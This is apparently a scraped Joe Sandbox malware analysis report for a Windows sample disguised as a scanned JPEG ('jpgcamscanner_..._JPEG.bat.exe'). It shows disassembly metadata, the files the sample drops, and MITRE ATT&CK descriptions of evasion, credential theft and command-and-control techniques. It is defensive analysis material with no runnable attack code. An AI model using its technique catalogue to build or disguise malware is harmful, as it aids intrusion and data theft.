Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e17704cfcf72c8df979941797e4b0b3defb04d6abbfe177bdd58f92bded9ed7
Instruction ID: ad71f402e4a9b92a37c553ea73d368b4d72ad24497358f0b079e3127edd250f9
Opcode Fuzzy Hash: 8e17704cfcf72c8df979941797e4b0b3defb04d6abbfe177bdd58f92bded9ed7
Instruction Fuzzy Hash: 5D713571D04229DBDF28CF98C844BADBBB1FF44305F15806AD856BB281C7389A96DF54

Function 004068FF Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 721cf2a7e84b7ceee3b40c5675287f3d3981b6f25cb9f163efdac731e148116f
Instruction ID: 5c7df32a9af3fd0bcd177ef93077855236352ac101eaea0ca8dc2b1de7da3dc3
Opcode Fuzzy Hash: 721cf2a7e84b7ceee3b40c5675287f3d3981b6f25cb9f163efdac731e148116f
Instruction Fuzzy Hash: B5715571D04229DBEF28CF98C844BADBBB1FF44305F15806AD842BB281C7389A96DF44

Function 00405A68 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CC3,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A78
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405A90
CharNextA.USER32(00000000,?,00000000,00405CC3,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AA1
lstrlenA.KERNEL32(00000000,?,00000000,00405CC3,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AAA

Memory Dump Source

Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 57b21f4120e00b08a3941e9ed4e610408d9ca53935617fe6296070accebd3829
Instruction ID: 037941339f6bd63fe355126afe518e0153d46939b0274778cc0aadc7e03f3bf8
Opcode Fuzzy Hash: 57b21f4120e00b08a3941e9ed4e610408d9ca53935617fe6296070accebd3829
Instruction Fuzzy Hash: 29F0C231605414AFC702DBA5DC40D9FBBA8EF46350B2541A6E800F7251D234EE01AFA9

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report jpgcamscanner_20240521_0072345_JPEG.bat.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\BgImage.dll

C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll

C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\nsDialogs.dll

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244\Grundtvigianerens.Unr

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244\Handrailing.cir

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244\Schweiziskes\Nonstationaries.pai

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244\Schweiziskes\Warmakers.fal

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244\Schweiziskes\aniara.uns

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244\Schweiziskes\bekendelsesskriften.pro

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244\Schweiziskes\databehandlingsforeningers.sky

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244\Schweiziskes\tsetseflues\electrohomeopathies.txt

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244\Shamponeringers\mildewy.jam

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244\Shamponeringers\natans.sma

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244\Shamponeringers\ovest.tho

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244\Shamponeringers\paksks.pre

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244\Shamponeringers\stttepartiets.mis

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244\Shamponeringers\utilidors.lok

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244\Shamponeringers\xenonet.mul

Windows Analysis Report
jpgcamscanner_20240521_0072345_JPEG.bat.exe

Function 004031D6 Relevance: 87.9, APIs: 32, Strings: 18, Instructions: 366
stringcomfileCOMMON

Function 004051CF Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Function 00405732 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Function 00403B35 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Function 00403798 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 00402D63 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Function 00405F8C Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 199
stringCOMMON

Function 00401759 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Function 00405091 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Function 00405557 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39
COMMON

Function 00406294 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 00402F9C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
COMMON

Function 00405B32 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Function 6DDA16DF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre